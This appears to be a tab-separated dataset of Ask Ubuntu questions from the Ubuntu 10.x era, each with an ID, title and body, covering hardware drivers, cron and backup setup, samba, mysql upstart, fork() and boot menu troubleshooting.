15143	is it possible to get drivers for hp laserjet 1200 ?	i know about ndiswrapper for windows network drivers . is there anything like that for windows printer related drivers ? ( or a `` universal '' driver for ubuntu by hp ? )
15146	automatic backup with back in time ?	i have installed back in time backup application and configured to backup one important folder every day into another folder . question . does it perform backup operation only when the application is open ( or launched ) ? should i launch this application every time i log in to ubuntu ? if yes , how can i make it to run automatically every time i log in to ubuntu ? thank you beforehand .
15150	opening cd-rom with bash code	i have copied this bunch of code from one funny video clip about how does a programmer swing his baby . the code is following : # ! /bin/bash while [ l=l ] do # eject cdrom eject # pull cdrom track back in eject -t done but it does n't work for me , when i run it with the command sh baby_rocker.sh it performs the code and outputs the following message eject : unable to find or open device for : `` cdrom '' even though i have cd-rom device on my computer . how can i make it to work ?
15160	command to quit [ cleanly ] gui applications from a tty ?	while running alpha/beta ubuntu , i have often had problems where x freezes and i would have to restart x . during this freeze , i 'm able to switch to a tty and shutdown the programs . i either use top and kill the running apps [ evolution/firefox/etc , .. ] , or use killall commands . but when i use those kill commands , the application shuts-down abruptly and when opening in the next session it 'recovers ' . ex : firefox needs to restore all the web-pages i was viewing , so if i had 20-30 tabs open it will literally freeze for a few mins . evolution would not have deleted messages in trash , etc.. is there a command i can use to shutdown applications cleanly from a tty ? [ apps that i use regularly are firefox , evolution , transmission , xchat ]
15164	upgrade from 10.04 to 10.10	i have installed 10.04 in june 2010 and last time while updating i messed up with my graphics driver . i am not able to apply the extra visual effects and also yet i am unable to find out driver for my motion eye webcam . i tried `` cheese '' but not succeed it shows no device found . my question is that can upgrading to 10.10 solve my problem . if yes then please tell me that should i have to fresh installation or not ? i have a sonyvaio vgn cr 363 laptop with ati radeon x2300 .
15168	input/output error , when trying to install on netbook	been trying to install ubuntu on my samsung nb30 netbook , but i have been running into the same error over and over again . [ errno 5 ] input/output error this particular error is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . i 'm installing from the usb bootable version , i get the exact same error at the exact same point when trying to install both ubuntu desktop and ubuntu desktop remix . i 've tried redownloading both isos twice and i 've tried two different usb sticks ( one being completely new ) . i 've tried installing from with in an ubuntu live session and i get the exact same problem . i 've ran a bootable memtest and everything passes with no errors , i 've also ran a dmesg in terminal after the installer fails here 's what it reported thanks in advance ! edit : i know this was ages ago , but to anyone out there with the same issue , the problem turned out to be the downloaded image , my internet is poor at the best of times and the iso failed the md5sum check , if this happens to you i recommend you download the iso image by torrent , it 'll check the integrity of the file is maintained .
15169	dell inspiron n5010 brightness issue	i have recently installed ubuntu 10.10 on my dell inspiron n5010 but screen brightness is not working , there is no effect of pressing fn+brightness keys . is there anyway to fix it ?
15175	how do i record sound on a thinkpad edge 11 ?	i can not record sound - so neither empathy nor any sip software works . i am updateing it regularly . i am 100 % sure that this is a driver problem - i installed fedora and had same problem with sound . i read about forcing the snd-hda-intel driver - but did not find anything about the thinkpad edge 11 . link to reported bug : https : //bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/683926
15177	trouble shooting internet connection problems ?	just installed a wireless usb driver using ndiswrapper . the icon and menu options `` says '' i 'm connected ; meaning that i 'm able to disconnect , connect , etc. , but firefox is not connecting to the internet . one thing i did change was that for some strange reason firefox appears to have been set by default to be in `` work offline '' mode ; which well , is an interesting default . do i need to enable something ; the http port for example ? if not , how do i isolate the source of the issue ? for example , attempt to do a `` ping google.com '' from the terminal , but appears ubuntu did n't like that syntax . thanks , and if you have any questions , just let me know !
15179	dual boot on dual hard drive set up	i currently have ubuntu and windows 7 on identical but separate hard drives . i wanted to use a ntfs partition on ubuntu drive to allow file sharing between to two os 's but when i formatted that partition , i accidentally shot my self in the foot by deleting my boot info . so i now must reformat and reinstall my windows os because i accidentally deleted my bootmgr and when i do i wanted to know , should i put each os on the same drive and have the other be a data drive in ntfs , or should i set it up as the way i had it again . also , its been a while since the last time i 've set it up so how do i select where i want the folder with all the boot info to go , or should i put in on its own partition somewhere .
15180	i ca n't open up url 's in hotot	when i click on any link an error message pops up saying `` the specified location is not supported '' . i 'm using lubuntu and hotot version 0.9.5 .
15184	using locate to find a directory	i use locate all the time to find files that i know the name of , locate is very fast and i love that . for recently created files find is great , normally with recently created files i know where basically they were created so i do n't have to search my entire file system . when i 've forgotten the location of a directory however neither find nor locate seem ideal . locate always spits out far too much information because every file within a directory is also a match for locate . for instance if i was searching for a directory named log somewhere on my file system locate log would return tons and tons of results . if i do the same thing with find , find / -name log -type d find takes minutes to run and spits out all sorts of permissions errors every time it encounters a folder it ca n't read . is there a better way ? answer : so i 'm sticking with grep until i find something else : locatedir ( ) { for last ; do true ; done if [ [ $ last == *\/* ] ] then locate $ @ | grep `` $ { last } \ $ '' else locate $ @ | grep `` / $ { last } \ $ '' fi }
15187	trash works on ntfs when mounted by nautilus , but not when automounted via /etc/fstab	i have 2 `` data '' drives . one is ntfs , the other is ext4 . the trash works for both drives when i allow nautilus to handle the mount . i 've opted to auto-mount them via entries in /etc/fstab , but when i do this , only the ext4 gives me a functioning trash directory . trash on the ntfs drive simply does not work . when i press `` delete '' or use the context menu item `` move to trash '' , i get this error dialog message . can not move file to trash , do you want to delete immediately ? . . . . the file `` test '' can not be moved to the trash . . . . here are my /etc/fstab lines . /dev/sdb1 /media/d_0931_data ntfs defaults 0 0 /dev/sdc1 /media/e_0298_back ext4 defaults 0 0 ... and here is how i created the mountpoint directories . sudo mkdir /media/d_0931_data sudo mkdir /media/e_0298_back everything seems to be working fine , except for the trash on the ntfs drive ... the trash on the ext4 drive works normally . update : more info about ownership change after sudo mount -a sudo mkdir /media/d_0931_data sudo mkdir /media/e_0298_back # ls -la /media drwxr-xr-x 2 root root 4096 2010-11-28 10:27 d_0931_data drwxr-xr-x 2 root root 4096 2010-11-28 10:27 e_0298_back # gksu gedit /etc/fstab /dev/sdb1 /media/d_0931_data ntfs defaults 0 0 /dev/sdc1 /media/e_0298_back ext4 defaults 0 0 # sudo mount -a # ls -la /media drwxrwxrwx 1 root root 12288 2010-11-28 10:22 d_0931_data drwxrwxr-x 5 root axiom 4096 2010-11-28 09:51 e_0298_back
15190	fglrx driver performance with compiz	i recently turned on compositing in my laptop using the following command : gconftool-2 -s -- type bool /apps/metacity/general/compositing_manager true performance seems to be same after that except for the fact that there 's a small noticeable delay in switching windows now when i hit alt+tab . also , there 's now a bit of lag when i play a game called teeworlds ( not graphics intensive ) . my laptop is low-end so i 'm not sure if it 's just my video card . i 'm debating if i should install the proprietary drivers to improve performance . can i get some advice on this ? output of lspci | grep -i vga is as follows : 01:05.0 vga compatible controller : ati technologies inc m880g [ mobility radeon hd 4200 ] i 'm not sure as to what drivers i 'm currently using , all i know is that i did n't touch it since installing karmic 9.10 so i know i 'm using an open source one . i 'm currently using 10.04 lts ( upgraded , not a clean install ) .
15198	is there a way to make openbox behave like the compiz grid plugin ?	i 've been happily using compiz with the grid plugin on ubuntu 10.04 on my mini inspiron netbook . however , due to battery life issues , i 'm considering downgrading to a lighter ubuntu derivative , and would like to try lubuntu , which uses the openbox window manager . i 'm wondering , is there any way to make openbox behave a bit more like a tiling window manager , in a manner similar to the compiz grid plugin ?
15203	how to add or modify launchers to the compiz unity dock ?	i 'm using the natty unity compiz plugin and and i ca n't find a way to add , rearrange or remove launchers on the dock .
15206	where does fork ( ) actually start ?	i 'm trying to learn unix programming and came across a question regarding fork ( ) . i understand that fork ( ) creates an identical process of the currently running process , but where does it start ? for example , if i have code int main ( int argc , char **argv ) { int retval ; printf ( `` this is most definitely the parent process\n '' ) ; fflush ( stdout ) ; retval = fork ( ) ; printf ( `` which process printed this ? \n '' ) ; return ( exit_success ) ; } the output is : this is most definitely the parent process which process printed this ? which process printed this ? i thought that fork ( ) creates a same process , so i initially thought that in that program , the fork ( ) call would be recursively called forever . i guess that new process created from fork ( ) starts after the fork ( ) call ? if i add the following code , to differentiate between a parent and child process , if ( child_pid = fork ( ) ) printf ( `` this is the parent , child pid is % d\n '' , child_pid ) ; else printf ( `` this is the child , pid is % d\n '' , getpid ( ) ) ; after the fork ( ) call , where does the child process begin its execution ?
15208	touchpad issues on hp pavilion dm4 ( ca n't right click )	can anyone help me with my touchpad issues ? i have a hp pavilion dm4 and it has two areas on the bottom of the touchpad to designate right and left clicks . this mostly does n't work on ubuntu in the fact that it recognizes any taps on either tap zone as a left click . instead , i have it set so if i tap anywhere on the pad it makes a left click . there should be , and there are , many ways in the mouse configuration window to simulate a right click using only a touchpad . none of these work . changing mouse orientation does n't do anything , `` dwell click '' also does nothing , and , the oddest part of this problem , whenever i try to turn `` simulated secondary click '' off ( it does n't work anyways , but just to try to toggle it ) , the entire theme of my desktop changes to a gray windows '95ey look . the only way to get rid of this is to close and reopen the mouse preferences window . my computer is fairly new and the ubuntu installation is less than a day old . i did n't do anything that i think could cause this . the problem is that i ca n't right click . help , please ? s that i ca n't right click . help , please ? afterword : i installed two scripts from http : //sansmicrosoft.blogspot.com/2010/10/pavilion-dm4-1160-erratic-touchpad.html . they did n't do anything i could n't already do , and they did not make it possible for me to right click . : (
15209	where are the guidelines for the software center approval process for paid applications ?	on every post on ubuntu gamer , the first reaction of people is always when will this come to software center ? are there any guidelines available on the ubuntu wiki already or they are being worked on ?
15211	saving deb files from repositories to a custom location for installing offline	i want to download and save some deb files , and preferably their dependencies , of certain apps , from the repositories ( apt-get , aptitude ) to a custom location without installing , so that i can install those apps while the machine is off-line . also i want to know if it is possible to download deb files for a 64 bit machine on a 32 bit machine .
15212	start synergy on boot ?	i use synergy . i would like to synergy to start as soon as i turn on my computer . how do i do that ? to start synergy , the command is : synergys -- config ~/.synergy.conf
15217	choppy video playback with vimeo and youtube	i am using maverick meercat on an acer aspire 5100 with 2gb of ram and an ati radeon xpress 1100 graphics card . i ca n't watch any video at all on this computer . i use both firefox and chrome and they both have the same problem . when i attempt to watch vimeo or youtube videos the playback is so choppy that it ca n't be watched . i have installed everything i can ( i think so anyway , i am a beginner with all this linux ) . any idea 's ? when the computer was running xp it did n't have these issues ...
15220	tools to diff deb-src packages between ubuntu and debian repos	i can already create duplicate repos with the same versions of debs and deb-src packages . the problem is that i want to find the ubuntu changes from debian mainline ( not from original source ) . that way i can use debian mainline with some of the customizations that ubuntu provides ( ubuntu does a lot of things well , but i think it is over-simplifying some things ... simple example is the upcoming unity migration ) . i think there is probably a tool to do this already and i ca n't find it . i could script it , but i would prefer not to ...
15222	mysql server upstart script not working on boot	for some reason the upstart script for the mysql server is n't working when i boot my server , however it does work once the server has booted and i execute sudo start mysql manually . i 'm running an openvz vps with ubuntu 10.04 installed and mysql version 5.1.41 ( latest stable from the repository ) . mysql is a fresh install with no config changed . /etc/init/mysql.conf : # mysql service description `` mysql server '' author `` mario limonciello < superm1 @ ubuntu.com > '' start on ( net-device-up and local-filesystems and runlevel [ 2345 ] ) stop on runlevel [ 016 ] respawn env home=/etc/mysql umask 007 pre-start script # sanity checks [ -r $ home/my.cnf ] [ -d /var/run/mysqld ] || install -m 755 -o mysql -g root -d /var/run/mysqld # load apparmor profile if aa-status -- enabled 2 > /dev/null ; then apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld || true fi lc_all=c blocksize= df -- portability /var/lib/mysql/ . | tail -n 1 | awk ' { exit ( $ 4 < 4096 ) } ' end script exec /usr/sbin/mysqld post-start script for i in `seq 1 30` ; do /usr/bin/mysqladmin -- defaults-file= '' $ { home } '' /debian.cnf ping & & { exec `` $ { home } '' /debian-start # should not reach this line exit 2 } sleep 1 done exit 1 end script
15223	how can i restart pulseaudio without logout ?	sometimes pulseaudio service stops and it does n't restarts itself when i open an audio file with banshee or totem . how i can make it start again without logout ?
15225	facebook video is too choppy to watch	using firefox and chrome on an acer aspire 5100 with an amd turion 64 mk36 processor with 2gb of ram and an ati radeon xpress 110 graphics card . i had a problem viewing vimeo and youtube that has now been resolved with the help of this website . but now i find that trying to watch facebook videos from family and friends is impossible due to the terrible choppy frame rate and near freezing of the browser window . any idea what is going on and how to fix it ?
15227	ubuntu start-up problem	ubuntu is showing the following screen when i turned on my computer . im using ubuntu 10.04.just ca n't get any further .
15228	why wo n't samba let me delete a file	i 'm not an expert at linux -- i 'd say 6 on a scale of 1-10 i just set up samba on my linux ubuntu server ( no gui , cli only ) . i created the smb account and connected from my mac and mounted my home directory for the most part it works fine . i did the normal test , touch a file then delete it . strangely i could create the file fine but could n't delete it . i looked around the web and saw this problem a lot -- most answers were related to permission settings in the smb.conf file . i played with these but i do n't think that 's the problem . from my mac i can even chmod the settings to 777 ( and i checked from the linux server to see that the chmod took , it did ) , and i can modify the file i created , but ca n't delete it . i 'm pretty confused , i 'm wondering if it might have something to do with samba itself not having permissions , but that 's beyond what i know how to check . edit : i 'm still curious about this -- for the most part i just moved to sshfs which is pretty awesome and took me 3 minutes and no thought whereas i was hours into working with smb & nfs . [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = workgroup netbios name = hp # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . encrypt passwords = true # if you are using encrypted passwords , samba will need to know what # password database type you are using . passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u
15234	how do i uninstall kubuntu and install ubuntu ?	i want to uninstall kubuntu and install ubuntu , but i want to completely clear former installation first . how do i do it most unharmfully ?
15240	how to change the icon for network monitor applet ?	i want to change my network monitor applet to this icon.currently my network monitor applet has this icon .i am using ubuntu 10.04 , how to do this ?
15243	cloud server stuck on dpkg -- configure -a	i have an amazon micro instance which runs one or two things for me . the config is minimal , it mainly acts as a host for a java application and couchdb . i tried to install curl today and got this message : sudo apt-get install curl e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i ran the command using sudo : sudo dpkg -- configure -a setting up openjdk-6-jre-headless ( 6b20-1.9.1-1ubuntu3 ) ... and it 's been hanging there for a looooooong time . top reports that a java process is using just about all of my cpu . any ideas what this problem is and how i can fix it ? any ideas on what caused the issue ?
15244	how can i create a cron command that will execute a command inside a detached screen ?	i have created a screen , but can i now somehow execute a command that will run commands in the detached screen ? i do not even know if this is possible , but if it is , it will probably be something simple and easy for you . thank you for your effort .
15245	wireless ( broadcom ) just stopped working after putting machine to sleep !	had the wireless working on my dell studio 15 for months now ( ubuntu 10.04 64bit , now 10.10 64bit ) . but i shut the lid this morning , which put the machine to sleep ; when i openend it again the wireless would no longer connect to anything : ' ( i rebooted the machine , but that did n't help . i then did ifconfig eth1 { down , up } , but that did n't help , then i did iwconfig eth1 power { down , on } , but that did n't work . so i uninstalled the wireless driver ( broadcom sta ) from additional drivers ( reboot in the middle ) , but it still wo n't work anymore ! ! this is the trace from daemon.log , looks like it is a driver issue ? nov 28 12:26:39 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : disconnected - > scanning nov 28 12:26:39 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : scanning - > disconnected nov 28 12:26:45 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : disconnected - > scanning nov 28 12:26:50 ulap wpa_supplicant [ 1295 ] : trying to associate with my_mac_code ( ssid='my_wiress_ssid ' freq=2417 mhz ) nov 28 12:26:50 ulap wpa_supplicant [ 1295 ] : association request to the driver failed nov 28 12:26:50 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : scanning - > associating nov 28 12:26:51 ulap wpa_supplicant [ 1295 ] : associated with my_mac_code nov 28 12:26:51 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : associating - > associated nov 28 12:27:01 ulap wpa_supplicant [ 1295 ] : authentication with my_mac_code timed out . nov 28 12:27:01 ulap networkmanager [ 1218 ] : ( eth1 ) : supplicant connection state : associated - > disconnected anyone seen this , or know how i can get around this issue ? it had been working fine up until now ? ! even ran update-manager , but there was n't any changes to the wireless drivers ( or any related networking areas ) . running the most up-to-date version of 10.10 x64 . my android phone and other devices are still working on the wireless .
15246	can i download ubuntu 'lite ' - just the core ?	as a bit of a personal project im wanting to create a very lightweight desktop environment with something like fluxbox . as a start point im wanting to use something like a lightweight version of ubuntu - ubuntu but without the gui and only the most limited set o f applications , and then move from there . is there anywhere i get something like this ? or alternatively am i best just to download debian and then add the ubuntu repositories to the sources list so i can still the best bits of ubuntu software ? ** edit ** to clear up any confusion - im looking for minimal install that contains only the bare minimum ubuntu needs to operate as a distinct distribution . i.e as few applications and auxiliary libraries as possible . from there i want to add these manually myself . i am aware that you could argue that the applications and libraries are what make ubuntu ubuntu - to an extent i agree . what i want to do is make use of the ubuntu infrastructure and repositories , whilst still coming up with something of my own creation .
15250	securing system admin account	as it is well known , it is recommended that the system administrator login to the system using a normal user ( non-root ) . when the admin needs to do privileged tasks , sudo can be used to become superuser . before gaining the requested privileges , the admin will be prompted to enter the same password used in the first login . i was wondering whether it is possible to configure the system to ask the user for a different password when doing sudo . so , the user will have two passwords . the first password will provide access to ssh session . the other password ( not the same one ) will be used to gain the admin ( root ) privileges . is this possible ? i think it will add more security to the system . do you agree ? btw , this will be similar to the access control used by cisco devices . first , the admin login using a password . then , accessing `` enabled '' ( privileged ) mode requires another password ( can be different or same password ) .
15254	unable to share a folder between windows 7 and ubuntu ( running in vmware )	i have installed vmware toolbox in ubuntu ( guest os ) . i tried to share a location from the settings of the virtual machine . but when i click ok , the following error in thrown in the host ( win 7 ) os . unable to update run-time folder sharing status : unknown error . the location is not showing up in /mnt/ what could be the reason ? p.s i have vmhgfs process running in my ubuntu vm . i was following the how-to-share-folders-with-your-ubuntu-virtual-machine-guest method from howtogeek.com
15255	cron jobs show up in gnome scheduler but do n't execute	i have configured back in time and mysql administrator to make a backup every day at 15:00 . in order to be sure i have installed gnome scheduler to see whether these two applications are registered there . they are registered in gnome scheduler but they do n't perform back up operation . here is the screenshot of gnome scheduler . how can i solve this problem ? update the output of crontab -l command is following : bakhtiyor @ ubuntu-vm : ~ $ crontab -l 0 15 * * * /usr/bin/mabackup -d /home/bakhtiyor/backup/mysql -x my-backup profile # job_id_3 0 15 * * * nice -n 19 /usr/bin/backintime -- backup-job # job_id_2 update 2 the output of grep cron /var/log/syslog command is following : nov 30 11:39:01 ubuntu-vm cron [ 7663 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) -print0 | xargs -n 200 -r -0 rm ) nov 30 11:39:02 ubuntu-vm cron [ 7661 ] : ( cron ) info ( no mta installed , discarding output )
15260	how can i monitor the output of an already running program ?	i am trying to figure out what is going on with pulseaudio on my computer because almost every 20 seconds of listening to a song it freezes . i 've tried killall pulseaudio & & pulseaudio to try to get the output of pulseaudio for when it crashes but for some reasons it gives me an error . oddly something to do with alsa e : module-alsa-card.c : failed to find a working profile . e : module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 1 '' name= '' 1 '' card_name= '' alsa_card.1 '' tsched=yes ignore_db=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed . i am not really sure if this is the problem , but if it is , i would still like to know for future reference how i could monitor the output of a program which has not been manually called through the terminal .
15262	graphical editor for gsettings/dconf ?	is there an equivalent to gconf-editor for gsettings/dconf ? i know that i can use gsettings set ... on the command line , but that 's a bit inconvenient ( especially with list types ) .
15263	how can i stop banshee from downloading podcasts as 'read only '	when banshee downloads podcasts to the 'podcasts ' folder , it marks that folder as read only . this is a problem when i want to sync them to my android smartphone and i am unable to listen to them because of this permission setting . i am able to change the permissions of the folder manually , but when it updates the feeds , it resets them . i 've found a few threads about the internet , including the ubuntu forums , but no-one is able to find a solution .
15269	update-manager does n't request pw - just noops	i upgraded to maverick and now i never get the password dialog that 10.04 had for installing packages - it just noops from the gui . ran update-manager with user privileges from terminal and no error output . i understand that 10.10 now uses apt . is there a simple fix in the policy mods to enable requesting confirmation of su privileges as it did in 10.04 ?
15270	w : gpg error : http : //ppa.launchpad.net lucid release:	after i run sudo aptitude update i get the below error : w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 4784331d8baf9a6f
15274	can not log into chat	i have set up the chat and broadcast accounts : clicked on my user name on the panel and chose chat accounts ... and broadcast accounts ... now when i log into my system i can not choose my status . in fact it is offline and i can not choose any of the statuses . if i disable and enable one of them , the status will be online and i can choose any of the statuses . but if i choose offline , then again : i can not choose any of the statuses .
15276	why are last.fm 's features unavailable to banshee users who do n't subscribe to the service ?	whenever i try to do anything other view my last.fm profile in banshee , i am confronted with the following message at the bottom of the inteface : failed to tune into station : stations are only available to paying last.fm subscribers these are features i 've been able to use in both the last.fm client from the software center and the rhythmbox plugin . i can also go to the website and listen there . what gives ? update : to clarify , i have a last.fm account , but am not a paying subscriber . following a link in the answer provided by dor , it seems last.fm changed the structure of their service to be restricted outside of the us , uk and germany , but i am in the uk so this still just as confusing .
15278	how do i get a genius ilook 300 webcam to work ?	please help me install webcam genius ilook 300 v1.4 in ubuntu 10.04. lsusb show this : bus 003 device 002 : id 093a:2628 pixart imaging , inc .
15280	how to find out what device a file or folder is on ?	is it possible to query ( using the command line ) what device a particular file or folder is on ? all files are on some sort of storage device ( eg . /dev/sda1 ) . these storage devices are mounted at a particular point in the file system hierarchy ( eg . / , /home ) . i want to find out what device a file is on . for example , if /dev/sda3 is mounted on /home , given the file ~/document.odt , what command can i use to determine that the file is on /dev/sda3 ?
15283	are there karma thresholds on launchpad for gaining access to certain features	i 'm currently reviewing bus on launchpad and the option to triage them is greyed out for me . is this because my karma is not high enough ( 599 at time of writing ) or is it because i 'm not a part of the correct team ( i 'm working on papercuts ) .
15284	how to boot to root shell when grub recovery menu fails to load a shell ?	ca n't seem to boot into root shell in recovery mode from grub . i try booting into recovery mode from the grub menu and do n't ever get a shell , just log messages from the kernel bootup . ctrl+alt+f1-f12 do n't really give me anything important either .
15290	why is the default wallpaper in jpg format , rather than a lossless format like png ?	is it just to save disk space ? or does it effect loading time/performance in some way ? you 'd think that you 'd want the best quality possible image for something you 'll be looking at throughout the day .
15294	why is the ubuntu one server side application proprietary ?	note : as of 02-04-14 . canonical has announced that they will be shutting down the ubuntu one service , and in the process , will make the server side application open source as well , as detailed in their blog post i 've come across the launchpad bug report which gave me some insight into people 's opinions on the matter , but did n't explain why canonical made this decision . the wikipedia article on ubuntu one did n't contain any links to announcements that would clear this up . question : why is the ubuntu one server side application proprietary ?
15296	kernel panic : line 61 : ca n't open /scripts/functions	i 'm facing a problem with all the kernels installed at my system ( ubuntu 10.10 64-bit ) . installed kernel versions : 2.6.32-21 up to 2.6.35.23 . the booting halted with the following error : init : . : line 61 : ca n't open '/scripts/functions' kernel panic - not syncing : attempted to kill init ! pid : 1 , comm : init not tainted only the first one ( 2.6.32-21 ) was working up until know . i asked for help at ubuntuforums.org and i was told to check if there 's any problem regarding my graphics card ( ati radeon ) . i uninstalled all the ati-related packages as well as all the unecessary xserver-xorg-video-* drivers that were installed . i then rebooted and from then on all of the kernels halt with the same error ( i.e . it did n't fix the problematic kernels , it just broke the only one that was working ... ) any ideas on what i should try next ? thanks in advance . pavlos .
15299	ssd installation error : read-only file system : '/target/bin '	i 'm having real issues reinstalling 10.04 to an ssd - i had one ssd fail , and have replaced it with a brand new one , but the 10.04 installer fails at beginning to write files to the disk with this error : [ errno 30 ] read-only file system : '/target/bin ' . curiously : windows xp will install to this ssd with no issues i can install 10.04 to a standard hard drive with no errors . what is happening that is stopping me from installing 10.04 to this drive ? i am positive that there is no issue with the ssd ( i have two brand new , identical ssds which both encounter this error . ) they are ocz vertex ii 60gb drives . i have tried partitioning the drive using gparted on another machine , leaving 5mb free at the start of the drive , and having a single partition for / , and a 1gb swap partition . `` round to cylinders '' was unchecked . the partitioning was successful , and the drives can be mounted on my other machine , but the 10.04 installer encounters the same error . any suggestions for what to try next would be appreciated , or i 'll be stuck with reverting to a hdd !
15301	how to make alt+tab with gnome-do 's docky work ?	i would like to use gnome-do 's docky but it requires me to enable either visual effects in the appearances preferences ( change from none to normal ) which i think enables compiz or metacity 's compositing_manager option in gconf-editor the problem is that when i change my visual effects from none to normal , i can no longer drag and drop a window to another workspace using the workspace switcher applet . from what i 've read , this is a compiz bug that has n't been fixed for years . on the other hand , the problem with using metacity 's compositing_manager is that my alt+tab becomes noticeably slower than the usual . is there a way to make things work ? since it seems that the compiz problem is not going to be fixed , i wonder if there 's a way to fix my alt+tab with metacity 's compositing enabled .
15306	how do i install ubuntu ( i 'm a linux noob ) ?	assuming i know nothing about linux , where do i go to download the installation files , and how do i go about installing it ? are there certain resources i can read to answer these questions.bare in mind the context of this question is someone who has only used windows and therefore is not familiar with previous linux installations .
15311	graphical traceroute with map from repository	it seems like xt ( xtraceroute ) has been dropped from the repository , does anyone know of another graphical traceroute program in the main repos which draws maps ? if not , then a loose deb package will do , or a ppa .
15312	simple way to consistently access a smb mount ?	is there any simple gui way to make an smb share persistent ? i do n't quite remember the steps , but on windows , once you 've mapped a share to a drive , you 're given the option to 'reconnect on boot ' ( or something like that ) . i figure i can just edit fstab , but this is something i have less technical users ( as in gui only ) wanting to do , and it would be nice if there was some simple way to accomplish this . [ note : edited the title to reflect that while i originally specified 'persistent ' for my use , something that 's can be consistently accessed is fine . ]
15314	debian stable vs ubuntu lts for server ?	which is a better platform for a professional use server ? debian stable or ubuntu lts ? the third party software we plan to use , works on both . which one is better on it own merits ? take into account things like the kernel ( ubuntu for example has its own custom kernel for servers ) , and other ubuntu specific customizations . i keep switching back and forth , and i need to decide so i can recommend one or the other to a client . right now , i think i am going to choose debian stable . recently , i have had ubuntu server edition 10.04.1 have a few strange issues ... i have ubuntu setup to do automatic updates via a simple script , and every few months or so , libapache2-mod-php5 gets removed because of conflicting packages ... thereby causing me to loose the php function of the web server . debian stable has not done anything like this .
15317	where can i download drivers for lenovo s10-3 ?	where can i download drivers for lenovo s10-3 to make it work in ubuntu 10.xx ? or is the xp driver enough to work in ubuntu ?
15318	how to remove the unwanted entries from the boot menu ?	when my system boots up , a big list of some 6 options are shown other than the windows os option . they are like : ubuntu 10.04- linux kernel 2.6.32-25 ubuntu 10.04- linux kernel 2.6.32-25 ( recovery ) ubuntu 10.04- linux kernel 2.6.32-26 ubuntu 10.04- linux kernel 2.6.32-26 ( recovery ) ... etc memory test.. windows xp professional how to remove the unwanted entries from this list ?
